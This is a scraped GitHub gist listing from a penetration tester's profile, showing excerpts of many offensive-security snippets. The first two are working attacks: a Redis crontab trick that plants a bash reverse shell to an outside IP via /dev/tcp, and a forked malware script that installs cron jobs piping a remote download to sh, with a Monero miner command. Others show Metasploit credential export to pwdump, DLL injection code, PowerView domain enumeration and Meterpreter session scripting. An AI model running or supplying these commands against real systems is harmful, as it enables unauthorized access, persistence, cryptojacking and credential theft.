Chris Gates carnal0wnage

twitter: @carnal0wnage talks: http://www.slideshare.net/chrisgates blog: http://carnal0wnage.attackresearch.com/

949 followers · 129 following

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

carnal0wnage / gist:df7082a56f1d7bc9681ceb3fea65c0fe

Last active May 14, 2025 16:07

redis crontab shell

	redis-cli flushall
	echo -e "\n\n/1 * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"\|redis-cli -x set 1
	redis-cli config set dir /var/spool/cron/
	redis-cli config set dbfilename root
	redis-cli save



	from https://phpinfo.me/2016/07/07/1275.html

carnal0wnage / redis-noauth-lady-hack.sh

Created January 4, 2017 00:35 — forked from lokielse/redis-noauth-lady-hack.sh

	export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

	echo "/15 * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 \| sh" > /var/spool/cron/root
	mkdir -p /var/spool/cron/crontabs
	echo "/15 * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 \| sh" > /var/spool/cron/crontabs/root

	# ps auxf \| grep -v grep \| grep yam \|\| nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr &


	if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then

carnal0wnage / export_workspaces.rb

Last active November 11, 2016 20:56

Export a list of workspaces from metasploit databases and credentials

	<ruby>
	File.open("/root/workspaces.txt", "r") do \|f\|
	f.each_line do \|line\|
	run_single("workspace #{line}")
	run_single("db_export -f xml -a /root/msf_workspace_export/#{line}_export_13Aug2016.xml")
	run_single("db_export -f pwdump -a /root/msf_workspace_export/#{line}_export_13Aug2016.pwdump")
	end
	end
	</ruby>

carnal0wnage / python_email.py

Created June 21, 2016 16:47 — forked from srv89/python_email.py

Python code for sending HTML email (Attachment + Multiple Recipients )

	__author__ = 'srv'

	import smtplib
	from email.mime.multipart import MIMEMultipart
	from email.mime.text import MIMEText
	from email.mime.application import MIMEApplication

	username = '' # Email Address from the email you want to send an email
	password = '' # Password
	server = smtplib.SMTP('')

carnal0wnage / 00readme.md

Created June 4, 2016 03:34 — forked from indrora/00readme.md

DeadUpdate: Kickin' it bigtime.

                             From the vendor that brought you a
                        vulnerable cloud storage platform comes
                        
           ___              ____  __        __     __ 
          / _ \___ ___ ____/ / / / /__  ___/ /__ _/ /____ 
         / // / -_) _ `/ _  / /_/ / _ \/ _  / _ `/ __/ -_)
        /____/\__/\_,_/\_,_/\____/ .__/\_,_/\_,_/\__/\__/ 
         Because popping SYSTEM /_/ is easy when you trust HTTP

Or, "How I learned to stop worrying and

carnal0wnage / dll_injection.py

Created May 22, 2016 02:03 — forked from RobinDavid/dll_injection.py

Sample ddl injection (Gray Hat Python)

	import sys
	from ctypes import *

	PAGE_READWRITE = 0x04
	PROCESS_ALL_ACCESS = ( 0x000F0000 \| 0x00100000 \| 0xFFF )
	VIRTUAL_MEM = ( 0x1000 \| 0x2000 )

	kernel32 = windll.kernel32 #Get the wanted dll

	pid = sys.argv[1] #Gather sent parameters

carnal0wnage / PowerView-2.0-tricks.ps1

Created March 19, 2016 22:26 — forked from HarmJ0y/PowerView-2.0-tricks.ps1

PowerView-2.0 tips and tricks

	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server
	Get-NetLocalGroup -Recurse SERVER.domain.local

	# retrieve all the computers a GPP password applies to

carnal0wnage / gist:7d068511b8b287942eec

Created February 27, 2016 23:06

snippet for blog

	msf post(execute) > sessions -s checkvm
	[*] Session 5 (13.37.1.11):
	[*] Running script checkvm on meterpreter session 5 (13.37.1.11)
	[*] Checking if target is a Virtual Machine .....
	[*] It appears to be physical host.
	[*] Session 6 (13.37.1.11):
	[*] Running script checkvm on meterpreter session 6 (13.37.1.11)
	[*] Checking if target is a Virtual Machine .....
	[*] It appears to be physical host.
	[*] Session 7 (13.37.5.10):

carnal0wnage / gist:cbe3a4ab1c78d7fbe096

Created February 27, 2016 15:05

snippet for blog post

	msf > sessions -h
	Usage: sessions [options]

	Active session manipulation and interaction.

	OPTIONS:

	-K Terminate all sessions
	-c <opt> Run a command on the session given with -i, or all
	-h Help banner

carnal0wnage / run_meterp_screenshot.rb

Created February 27, 2016 15:02

run the screenshot command against all active sessions

	<ruby>
	framework.sessions.each do \|session\|
	session.run_cmd("screenshot")
	end
	</ruby>

Newer Older